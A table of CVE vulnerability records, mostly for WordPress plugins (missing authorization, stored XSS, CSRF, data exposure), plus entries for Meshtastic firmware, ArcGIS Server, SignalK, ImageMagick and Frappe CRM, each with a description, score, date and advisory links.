| Eduardo Villo--MyD Delivery | Authorization Bypass Through User-Controlled Key vulnerability in Eduardo Villão MyD Delivery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects MyD Delivery: from n/a through 1.3.7. | 2025-12-31 | 5.3 | CVE-2025-49334 | https://vdp.patchstack.com/database/wordpress/plugin/myd-delivery/vulnerability/wordpress-myd-delivery-plugin-1-3-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| janhenckens--Dashboard Beacon | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in janhenckens Dashboard Beacon allows Stored XSS.This issue affects Dashboard Beacon: from n/a through 1.2.0. | 2025-12-31 | 5.9 | CVE-2025-49337 | https://vdp.patchstack.com/database/wordpress/plugin/wp-dashboard-beacon/vulnerability/wordpress-dashboard-beacon-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Flowbox--Flowbox | Missing Authorization vulnerability in Flowbox allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Flowbox: from n/a through 1.1.5. | 2025-12-31 | 5.3 | CVE-2025-49338 | https://vdp.patchstack.com/database/wordpress/plugin/flowbox/vulnerability/wordpress-flowbox-plugin-1-1-5-broken-access-control-vulnerability?_s_id=cve |
| Reuters News Agency--Reuters Direct | Missing Authorization vulnerability in Reuters News Agency Reuters Direct allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Reuters Direct: from n/a through 3.0.0. | 2025-12-31 | 5.3 | CVE-2025-49349 | https://vdp.patchstack.com/database/wordpress/plugin/reuters-direct/vulnerability/wordpress-reuters-direct-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve |
| ikaes--Accessibility Press | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ikaes Accessibility Press allows Stored XSS.This issue affects Accessibility Press: from n/a through 1.0.2. | 2025-12-31 | 5.9 | CVE-2025-49355 | https://vdp.patchstack.com/database/wordpress/plugin/ilogic-accessibility/vulnerability/wordpress-accessibility-press-plugin-1-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| meshtastic--firmware | Meshtastic is an open source mesh networking solution. The Meshtastic firmware (starting from version 2.5) introduces asymmetric encryption (PKI) for direct messages, but when the `pki_encrypted` flag is missing, the firmware silently falls back to legacy AES-256-CTR channel encryption. This was an intentional decision to maintain backwards compatibility. However, the end-user applications, like Web app, iOS/Android app, and applications built on top of Meshtastic using the SDK, did not have a way to differentiate between end-to-end encrypted DMs and the legacy DMs. This creates a downgrade attack path where adversaries who know a shared channel key can craft and inject spoofed direct messages that are displayed as if they were PKC encrypted. Users are not given any feedback of whether a direct message was decrypted with PKI or with legacy symmetric encryption, undermining the expected security guarantees of the PKI rollout. Version 2.7.15 fixes this issue. | 2025-12-29 | 5.3 | CVE-2025-53627 | https://github.com/meshtastic/firmware/security/advisories/GHSA-377p-prwp-4hwf |
| Inkthemescom--Black Rider | Insertion of Sensitive Information Into Sent Data vulnerability in Inkthemescom Black Rider allows Retrieve Embedded Sensitive Data.This issue affects Black Rider: from n/a through 1.2.3. | 2025-12-31 | 5.8 | CVE-2025-59003 | https://vdp.patchstack.com/database/wordpress/theme/black-rider/vulnerability/wordpress-black-rider-theme-1-2-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| eLEOPARD--Behance Portfolio Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in eLEOPARD Behance Portfolio Manager allows Stored XSS.This issue affects Behance Portfolio Manager: from n/a through 1.7.5. | 2025-12-31 | 5.9 | CVE-2025-59135 | https://vdp.patchstack.com/database/wordpress/plugin/portfolio-manager-powered-by-behance/vulnerability/wordpress-behance-portfolio-manager-plugin-1-7-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Ef Bank--Gerencianet Oficial | Insertion of Sensitive Information Into Sent Data vulnerability in Efí Bank Gerencianet Oficial allows Retrieve Embedded Sensitive Data.This issue affects Gerencianet Oficial: from n/a through 3.1.3. | 2025-12-31 | 5.3 | CVE-2025-59136 | https://vdp.patchstack.com/database/wordpress/plugin/woo-gerencianet-official/vulnerability/wordpress-gerencianet-oficial-plugin-3-1-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| Damian--WP Export Categories & Taxonomies | Missing Authorization vulnerability in Damian WP Export Categories & Taxonomies allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Export Categories & Taxonomies: from n/a through 1.0.3. | 2025-12-31 | 5.3 | CVE-2025-62079 | https://vdp.patchstack.com/database/wordpress/plugin/wp-export-categories-taxonomies/vulnerability/wordpress-wp-export-categories-taxonomies-plugin-1-0-3-broken-access-control-vulnerability?_s_id=cve |
| Channelize.io Team--Live Shopping & Shoppable Videos For WooCommerce | Missing Authorization vulnerability in Channelize.Io Team Live Shopping & Shoppable Videos For WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Live Shopping & Shoppable Videos For WooCommerce: from n/a through 2.2.0. | 2025-12-31 | 5.3 | CVE-2025-62081 | https://vdp.patchstack.com/database/wordpress/plugin/live-shopping-video-streams/vulnerability/wordpress-live-shopping-shoppable-videos-for-woocommerce-plugin-2-2-0-broken-access-control-vulnerability?_s_id=cve |
| extendons--WordPress & WooCommerce Scraper Plugin, Import Data from Any Site | Server-Side Request Forgery (SSRF) vulnerability in extendons WordPress & WooCommerce Scraper Plugin, Import Data from Any Site allows Server Side Request Forgery.This issue affects WordPress & WooCommerce Scraper Plugin, Import Data from Any Site: from n/a through 1.0.7. | 2025-12-31 | 5.4 | CVE-2025-62088 | https://vdp.patchstack.com/database/wordpress/plugin/wp_scraper/vulnerability/wordpress-wordpress-woocommerce-scraper-plugin-import-data-from-any-site-plugin-1-0-7-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Vollstart--Serial Codes Generator and Validator with WooCommerce Support | Missing Authorization vulnerability in Vollstart Serial Codes Generator and Validator with WooCommerce Support allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Serial Codes Generator and Validator with WooCommerce Support: from n/a through 2.8.2. | 2025-12-31 | 5.4 | CVE-2025-62091 | https://vdp.patchstack.com/database/wordpress/plugin/serial-codes-generator-and-validator/vulnerability/wordpress-serial-codes-generator-and-validator-with-woocommerce-support-plugin-2-8-2-broken-access-control-vulnerability?_s_id=cve |
| Wiremo--Wiremo | Missing Authorization vulnerability in Wiremo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Wiremo: from n/a through 1.4.99. | 2025-12-31 | 5.3 | CVE-2025-62092 | https://vdp.patchstack.com/database/wordpress/plugin/woo-reviews-by-wiremo/vulnerability/wordpress-wiremo-plugin-1-4-99-broken-access-control-vulnerability?_s_id=cve |
| Totalsoft--Portfolio Gallery | Missing Authorization vulnerability in Totalsoft Portfolio Gallery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Portfolio Gallery: from n/a through 1.4.8. | 2025-12-31 | 5.4 | CVE-2025-62098 | https://vdp.patchstack.com/database/wordpress/plugin/gallery-portfolio/vulnerability/wordpress-portfolio-gallery-plugin-1-4-8-broken-access-control-vulnerability?_s_id=cve |
| SaifuMak--Add Custom Codes | Missing Authorization vulnerability in SaifuMak Add Custom Codes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Add Custom Codes: from n/a through 4.80. | 2025-12-31 | 5.4 | CVE-2025-62108 | https://vdp.patchstack.com/database/wordpress/plugin/add-custom-codes/vulnerability/wordpress-add-custom-codes-plugin-4-80-broken-access-control-vulnerability?_s_id=cve |
| Marcelo Torres--Download Media Library | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Marcelo Torres Download Media Library allows Retrieve Embedded Sensitive Data.This issue affects Download Media Library: from n/a through 0.2.1. | 2025-12-31 | 5.3 | CVE-2025-62114 | https://vdp.patchstack.com/database/wordpress/plugin/download-media-library/vulnerability/wordpress-download-media-library-plugin-0-2-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| Quadlayers--AI Copilot | Missing Authorization vulnerability in Quadlayers AI Copilot allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AI Copilot: from n/a through 1.4.7. | 2025-12-31 | 5.3 | CVE-2025-62116 | https://vdp.patchstack.com/database/wordpress/plugin/ai-copilot/vulnerability/wordpress-ai-copilot-plugin-1-4-7-broken-access-control-vulnerability?_s_id=cve |
| Jayce53--EasyIndex | Cross-Site Request Forgery (CSRF) vulnerability in Jayce53 EasyIndex easyindex allows Cross Site Request Forgery.This issue affects EasyIndex: from n/a through 1.1.1704. | 2025-12-31 | 5.4 | CVE-2025-62117 | https://vdp.patchstack.com/database/wordpress/plugin/easyindex/vulnerability/wordpress-easyindex-plugin-1-1-1704-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| ViitorCloud Technologies Pvt Ltd--Add Featured Image Custom Link | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ViitorCloud Technologies Pvt Ltd Add Featured Image Custom Link allows DOM-Based XSS.This issue affects Add Featured Image Custom Link: from n/a through 2.0.0. | 2025-12-31 | 5.9 | CVE-2025-62119 | https://vdp.patchstack.com/database/wordpress/plugin/custom-url-to-featured-image/vulnerability/wordpress-add-featured-image-custom-link-plugin-2-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Rick Beckman--OpenHook | Cross-Site Request Forgery (CSRF) vulnerability in Rick Beckman OpenHook allows Cross Site Request Forgery.This issue affects OpenHook: from n/a through 4.3.1. | 2025-12-31 | 5.4 | CVE-2025-62120 | https://vdp.patchstack.com/database/wordpress/plugin/thesis-openhook/vulnerability/wordpress-openhook-plugin-4-3-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Imran Emu--Logo Slider , Logo Carousel , Logo showcase , Client Logo | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Imran Emu Logo Slider , Logo Carousel , Logo showcase , Client Logo allows Stored XSS.This issue affects Logo Slider , Logo Carousel , Logo showcase , Client Logo: from n/a through 1.8.1. | 2025-12-31 | 5.9 | CVE-2025-62121 | https://vdp.patchstack.com/database/wordpress/plugin/tc-logo-slider/vulnerability/wordpress-logo-slider-logo-carousel-logo-showcase-client-logo-plugin-1-8-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Solwininfotech--Trash Duplicate and 301 Redirect | Missing Authorization vulnerability in Solwininfotech Trash Duplicate and 301 Redirect allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Trash Duplicate and 301 Redirect: from n/a through 1.9.1. | 2025-12-31 | 5.3 | CVE-2025-62122 | https://vdp.patchstack.com/database/wordpress/plugin/trash-duplicate-and-301-redirect/vulnerability/wordpress-trash-duplicate-and-301-redirect-plugin-1-9-1-broken-access-control-vulnerability?_s_id=cve |
| Soli--WP Post Signature | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Soli WP Post Signature allows Stored XSS.This issue affects WP Post Signature: from n/a through 0.4.1. | 2025-12-31 | 5.9 | CVE-2025-62124 | https://vdp.patchstack.com/database/wordpress/plugin/wp-post-signature/vulnerability/wordpress-wp-post-signature-plugin-0-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Razvan Stanga--Varnish/Nginx Proxy Caching | Insertion of Sensitive Information Into Sent Data vulnerability in Razvan Stanga Varnish/Nginx Proxy Caching allows Retrieve Embedded Sensitive Data.This issue affects Varnish/Nginx Proxy Caching: from n/a through 1.8.3. | 2025-12-31 | 5.3 | CVE-2025-62126 | https://vdp.patchstack.com/database/wordpress/plugin/vcaching/vulnerability/wordpress-varnish-nginx-proxy-caching-plugin-1-8-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| Magnigenie--RestroPress | Missing Authorization vulnerability in Magnigenie RestroPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RestroPress: from n/a through 3.2.4.2. | 2025-12-31 | 5.3 | CVE-2025-62129 | https://vdp.patchstack.com/database/wordpress/plugin/restropress/vulnerability/wordpress-restropress-plugin-3-2-4-2-broken-access-control-vulnerability?_s_id=cve |
| A WP Life--Contact Form Widget | Cross-Site Request Forgery (CSRF) vulnerability in A WP Life Contact Form Widget allows Cross Site Request Forgery.This issue affects Contact Form Widget: from n/a through 1.5.1. | 2025-12-31 | 5.4 | CVE-2025-62134 | https://vdp.patchstack.com/database/wordpress/plugin/new-contact-form-widget/vulnerability/wordpress-contact-form-widget-plugin-1-5-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| CedCommerce--WP Advanced PDF | Missing Authorization vulnerability in CedCommerce WP Advanced PDF allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Advanced PDF: from n/a through 1.1.7. | 2025-12-31 | 5.3 | CVE-2025-62138 | https://vdp.patchstack.com/database/wordpress/plugin/wp-advanced-pdf/vulnerability/wordpress-wp-advanced-pdf-plugin-1-1-7-other-vulnerability-type-vulnerability?_s_id=cve |
| Vladimir Statsenko--Terms descriptions | Insertion of Sensitive Information Into Sent Data vulnerability in Vladimir Statsenko Terms descriptions allows Retrieve Embedded Sensitive Data.This issue affects Terms descriptions: from n/a through 3.4.9. | 2025-12-31 | 5.3 | CVE-2025-62139 | https://vdp.patchstack.com/database/wordpress/plugin/terms-descriptions/vulnerability/wordpress-terms-descriptions-plugin-3-4-9-sensitive-data-exposure-vulnerability?_s_id=cve |
| Plainware--Locatoraid Store Locator | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Plainware Locatoraid Store Locator allows Stored XSS.This issue affects Locatoraid Store Locator: from n/a through 3.9.65. | 2025-12-31 | 5.9 | CVE-2025-62140 | https://vdp.patchstack.com/database/wordpress/plugin/locatoraid/vulnerability/wordpress-locatoraid-store-locator-plugin-3-9-65-cross-site-scripting-xss-vulnerability?_s_id=cve |
| 101gen--Wawp | Missing Authorization vulnerability in 101gen Wawp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Wawp: from n/a through 4.0.5. | 2025-12-31 | 5.3 | CVE-2025-62141 | https://vdp.patchstack.com/database/wordpress/plugin/automation-web-platform/vulnerability/wordpress-wawp-plugin-4-0-5-broken-access-control-vulnerability?_s_id=cve |
| nicashmu--Cincopa video and media plug-in | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in nicashmu Cincopa video and media plugin allows Stored XSS.This issue affects Cincopa video and media plug-in: from n/a through 1.163. | 2025-12-31 | 5.9 | CVE-2025-62142 | https://vdp.patchstack.com/database/wordpress/plugin/video-playlist-and-gallery-plugin/vulnerability/wordpress-post-video-players-plugin-1-163-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Mohammed Kaludi--Core Web Vitals & PageSpeed Booster | Missing Authorization vulnerability in Mohammed Kaludi Core Web Vitals & PageSpeed Booster allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Core Web Vitals & PageSpeed Booster: from n/a through 1.0.27. | 2025-12-31 | 5.4 | CVE-2025-62144 | https://vdp.patchstack.com/database/wordpress/plugin/core-web-vitals-pagespeed-booster/vulnerability/wordpress-core-web-vitals-pagespeed-booster-plugin-1-0-27-broken-access-control-vulnerability?_s_id=cve |
| NewClarity--DMCA Protection Badge | Missing Authorization vulnerability in NewClarity DMCA Protection Badge allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DMCA Protection Badge: from n/a through 2.2.0. | 2025-12-31 | 5.3 | CVE-2025-62145 | https://vdp.patchstack.com/database/wordpress/plugin/dmca-badge/vulnerability/wordpress-dmca-protection-badge-plugin-2-2-0-broken-access-control-vulnerability?_s_id=cve |
| Nik Melnik--Realbig | Missing Authorization vulnerability in Nik Melnik Realbig allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Realbig: from n/a through 1.1.3. | 2025-12-31 | 5.3 | CVE-2025-62147 | https://vdp.patchstack.com/database/wordpress/plugin/realbig-media/vulnerability/wordpress-realbig-plugin-1-1-3-broken-access-control-vulnerability?_s_id=cve |
| SaifuMak--Add Custom Codes | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SaifuMak Add Custom Codes allows Stored XSS.This issue affects Add Custom Codes: from n/a through 4.80. | 2025-12-31 | 5.9 | CVE-2025-62149 | https://vdp.patchstack.com/database/wordpress/plugin/add-custom-codes/vulnerability/wordpress-add-custom-codes-plugin-4-80-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Aum Watcharapon--Featured Image Generator | Missing Authorization vulnerability in Aum Watcharapon Featured Image Generator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Featured Image Generator: from n/a through 1.3.3. | 2025-12-31 | 5.3 | CVE-2025-62747 | https://vdp.patchstack.com/database/wordpress/plugin/featured-image-generator/vulnerability/wordpress-featured-image-generator-plugin-1-3-3-broken-access-control-vulnerability?_s_id=cve |
| Filipe Seabra--WooCommerce Parcelas | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Filipe Seabra WooCommerce Parcelas allows DOM-Based XSS.This issue affects WooCommerce Parcelas: from n/a through 1.3.5. | 2025-12-31 | 5.9 | CVE-2025-62750 | https://vdp.patchstack.com/database/wordpress/plugin/woocommerce-parcelas/vulnerability/wordpress-woocommerce-parcelas-plugin-1-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| GS Plugins--GS Portfolio for Envato | Unauthenticated Broken Access Control in GS Portfolio for Envato <= 1.4.2 versions. | 2025-12-31 | 5.3 | CVE-2025-62755 | https://vdp.patchstack.com/database/wordpress/plugin/gs-envato-portfolio/vulnerability/wordpress-gs-portfolio-for-envato-plugin-1-4-2-broken-access-control-vulnerability?_s_id=cve |
| Marco Milesi--WP Attachments | Missing Authorization vulnerability in Marco Milesi WP Attachments allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Attachments: from n/a through 5.2. | 2025-12-31 | 5.4 | CVE-2025-62888 | https://vdp.patchstack.com/database/wordpress/plugin/wp-attachments/vulnerability/wordpress-wp-attachments-plugin-5-2-broken-access-control-vulnerability?_s_id=cve |
| Boxy Studio--Cooked | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Boxy Studio Cooked allows Stored XSS.This issue affects Cooked: from n/a through 1.11.2. | 2025-12-31 | 5.9 | CVE-2025-62989 | https://vdp.patchstack.com/database/wordpress/plugin/cooked/vulnerability/wordpress-cooked-plugin-1-11-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| nicdark--Hotel Booking | Missing Authorization vulnerability in nicdark Hotel Booking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hotel Booking: from n/a through 3.8. | 2025-12-31 | 5.3 | CVE-2025-63001 | https://vdp.patchstack.com/database/wordpress/plugin/nd-booking/vulnerability/wordpress-hotel-booking-plugin-3-8-broken-access-control-vulnerability?_s_id=cve |
| Quadlayers--QuadLayers TikTok Feed | Missing Authorization vulnerability in Quadlayers QuadLayers TikTok Feed allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects QuadLayers TikTok Feed: from n/a through 4.6.4. | 2025-12-31 | 5.3 | CVE-2025-63016 | https://vdp.patchstack.com/database/wordpress/plugin/wp-tiktok-feed/vulnerability/wordpress-quadlayers-tiktok-feed-plugin-4-6-4-broken-access-control-vulnerability?_s_id=cve |
| Illia--Simple Like Page | Missing Authorization vulnerability in Illia Simple Like Page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple Like Page: from n/a through 1.5.3. | 2025-12-31 | 5.3 | CVE-2025-63022 | https://vdp.patchstack.com/database/wordpress/plugin/simple-facebook-plugin/vulnerability/wordpress-simple-like-page-plugin-1-5-3-broken-access-control-vulnerability?_s_id=cve |
| WP Grids--EasyTest | Missing Authorization vulnerability in WP Grids EasyTest allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects EasyTest: from n/a through 1.0.1. | 2025-12-31 | 5.3 | CVE-2025-63031 | https://vdp.patchstack.com/database/wordpress/plugin/convertpro/vulnerability/wordpress-easytest-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve |
| Jewel Theme--Master Addons for Elementor | Authorization Bypass Through User-Controlled Key vulnerability in Jewel Theme Master Addons for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Master Addons for Elementor: from n/a through 2.0.9.9.4. | 2025-12-31 | 5.3 | CVE-2025-63053 | https://vdp.patchstack.com/database/wordpress/plugin/master-addons/vulnerability/wordpress-master-addons-for-elementor-plugin-2-0-9-9-4-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| WP Legal Pages--WP Cookie Notice for GDPR, CCPA & ePrivacy Consent | Missing Authorization vulnerability in WP Legal Pages WP Cookie Notice for GDPR, CCPA & ePrivacy Consent allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Cookie Notice for GDPR, CCPA & ePrivacy Consent: from n/a through 4.0.3. | 2025-12-30 | 5.3 | CVE-2025-66080 | https://vdp.patchstack.com/database/wordpress/plugin/gdpr-cookie-consent/vulnerability/wordpress-wp-cookie-notice-for-gdpr-ccpa-eprivacy-consent-plugin-4-0-3-broken-access-control-vulnerability-2?_s_id=cve |
| merkulove--Worker for Elementor | Missing Authorization vulnerability in merkulove Worker for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Worker for Elementor: from n/a through 1.0.10. | 2025-12-31 | 5.4 | CVE-2025-66144 | https://vdp.patchstack.com/database/wordpress/plugin/worker-elementor/vulnerability/wordpress-worker-for-elementor-plugin-1-0-10-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Worker for WPBakery | Missing Authorization vulnerability in merkulove Worker for WPBakery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Worker for WPBakery: from n/a through 1.1.1. | 2025-12-31 | 5.4 | CVE-2025-66145 | https://vdp.patchstack.com/database/wordpress/plugin/worker-wpbakery/vulnerability/wordpress-worker-for-wpbakery-plugin-1-1-1-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Logger for Elementor | Missing Authorization vulnerability in merkulove Logger for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Logger for Elementor: from n/a through 1.0.9. | 2025-12-31 | 5.4 | CVE-2025-66146 | https://vdp.patchstack.com/database/wordpress/plugin/logger-elementor/vulnerability/wordpress-logger-for-elementor-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Conformer for Elementor | Missing Authorization vulnerability in merkulove Conformer for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Conformer for Elementor: from n/a through 1.0.7. | 2025-12-31 | 5.4 | CVE-2025-66148 | https://vdp.patchstack.com/database/wordpress/plugin/conformer-elementor/vulnerability/wordpress-conformer-for-elementor-plugin-1-0-7-broken-access-control-vulnerability?_s_id=cve |
| merkulove--UnGrabber | Missing Authorization vulnerability in merkulove UnGrabber allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects UnGrabber: from n/a through 3.1.3. | 2025-12-31 | 5.4 | CVE-2025-66149 | https://vdp.patchstack.com/database/wordpress/plugin/ungrabber/vulnerability/wordpress-ungrabber-plugin-3-1-3-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Appender | Missing Authorization vulnerability in merkulove Appender allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Appender: from n/a through 1.1.1. | 2025-12-31 | 5.4 | CVE-2025-66150 | https://vdp.patchstack.com/database/wordpress/plugin/appender/vulnerability/wordpress-appender-plugin-1-1-1-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Countdowner for Elementor | Missing Authorization vulnerability in merkulove Countdowner for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Countdowner for Elementor: from n/a through 1.0.4. | 2025-12-31 | 5.4 | CVE-2025-66151 | https://vdp.patchstack.com/database/wordpress/plugin/countdowner-elementor/vulnerability/wordpress-countdowner-for-elementor-plugin-1-0-4-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Criptopayer for Elementor | Missing Authorization vulnerability in merkulove Criptopayer for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Criptopayer for Elementor: from n/a through 1.0.1. | 2025-12-31 | 5.4 | CVE-2025-66152 | https://vdp.patchstack.com/database/wordpress/plugin/criptopayer-elementor/vulnerability/wordpress-criptopayer-for-elementor-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Headinger for Elementor | Missing Authorization vulnerability in merkulove Headinger for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Headinger for Elementor: from n/a through 1.1.4. | 2025-12-31 | 5.4 | CVE-2025-66153 | https://vdp.patchstack.com/database/wordpress/plugin/headinger-elementor/vulnerability/wordpress-headinger-for-elementor-plugin-1-1-4-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Couponer for Elementor | Missing Authorization vulnerability in merkulove Couponer for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Couponer for Elementor: from n/a through 1.1.7. | 2025-12-31 | 5.4 | CVE-2025-66154 | https://vdp.patchstack.com/database/wordpress/plugin/couponer-elementor/vulnerability/wordpress-couponer-for-elementor-plugin-1-1-7-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Questionar for Elementor | Missing Authorization vulnerability in merkulove Questionar for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Questionar for Elementor: from n/a through 1.1.7. | 2025-12-31 | 5.4 | CVE-2025-66155 | https://vdp.patchstack.com/database/wordpress/plugin/questionar-elementor/vulnerability/wordpress-questionar-for-elementor-plugin-1-1-7-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Watcher for Elementor | Missing Authorization vulnerability in merkulove Watcher for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Watcher for Elementor: from n/a through 1.0.9. | 2025-12-31 | 5.4 | CVE-2025-66156 | https://vdp.patchstack.com/database/wordpress/plugin/watcher-elementor/vulnerability/wordpress-watcher-for-elementor-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Slider for Elementor | Missing Authorization vulnerability in merkulove Slider for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Slider for Elementor: from n/a through 1.0.10. | 2025-12-31 | 5.4 | CVE-2025-66157 | https://vdp.patchstack.com/database/wordpress/plugin/sliper-elementor/vulnerability/wordpress-sliper-for-elementor-plugin-1-0-10-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Gmaper for Elementor | Missing Authorization vulnerability in merkulove Gmaper for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Gmaper for Elementor: from n/a through 1.0.9. | 2025-12-31 | 5.4 | CVE-2025-66158 | https://vdp.patchstack.com/database/wordpress/plugin/gmaper-elementor/vulnerability/wordpress-gmaper-for-elementor-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Walker for Elementor | Missing Authorization vulnerability in merkulove Walker for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Walker for Elementor: from n/a through 1.1.6. | 2025-12-31 | 5.4 | CVE-2025-66159 | https://vdp.patchstack.com/database/wordpress/plugin/walker-elementor/vulnerability/wordpress-walker-for-elementor-plugin-1-1-6-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Select Graphist for Elementor Graphist for Elementor | Missing Authorization vulnerability in merkulove Select Graphist for Elementor Graphist for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Select Graphist for Elementor Graphist for Elementor: from n/a through 1.2.10. | 2025-12-31 | 5.4 | CVE-2025-66160 | https://vdp.patchstack.com/database/wordpress/plugin/graphist-elementor/vulnerability/wordpress-select-graphist-for-elementor-graphist-for-elementor-plugin-1-2-10-broken-access-control-vulnerability?_s_id=cve |
| Esri--ArcGIS Server | ArcGIS Server version 11.5 and earlier on Windows and Linux does not properly validate uploaded files file, which allows remote attackers to upload arbitrary files. | 2025-12-31 | 5.6 | CVE-2025-67706 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| Esri--ArcGIS Server | ArcGIS Server version 11.5 and earlier on Windows and Linux does not properly validate uploaded files file, which allows remote attackers to upload arbitrary files. | 2025-12-31 | 5.6 | CVE-2025-67707 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| SignalK--signalk-server | Signal K Server is a server application that runs on a central hub in a boat. An unauthenticated information disclosure vulnerability in versions prior to 2.19.0 allows any user to retrieve sensitive system information, including the full SignalK data schema, connected serial devices, and installed analyzer tools. This exposure facilitates reconnaissance for further attacks. Version 2.19.0 patches the issue. | 2026-01-01 | 5.3 | CVE-2025-68273 | https://github.com/SignalK/signalk-server/security/advisories/GHSA-fpf5-w967-rr2m https://github.com/SignalK/signalk-server/releases/tag/v2.19.0 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-12, using Magick to read a malicious SVG file resulted in a DoS attack. Version 7.1.2-12 fixes the issue. | 2025-12-30 | 5.3 | CVE-2025-68618 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p27m-hp98-6637 https://github.com/ImageMagick/ImageMagick/commit/6f431d445f3ddd609c004a1dde617b0a73e60beb |
| frappe--crm | Frappe CRM is an open-source customer relationship management tool. Prior to version 1.56.2, authenticated users could set crafted URLs in a website field, which were not sanitized, causing cross-site scripting. Version 1.56.2 fixes the issue. No known workarounds are available. | 2025-12-29 | 5.4 | CVE-2025-68928 | https://github.com/frappe/crm/security/advisories/GHSA-fm34-v6j7-chwc https://github.com/frappe/crm/commit/c5766d9989131d17d954e866bfc4b8d3b23e4f10 https://github.com/frappe/crm/releases/tag/v1.56.2 |
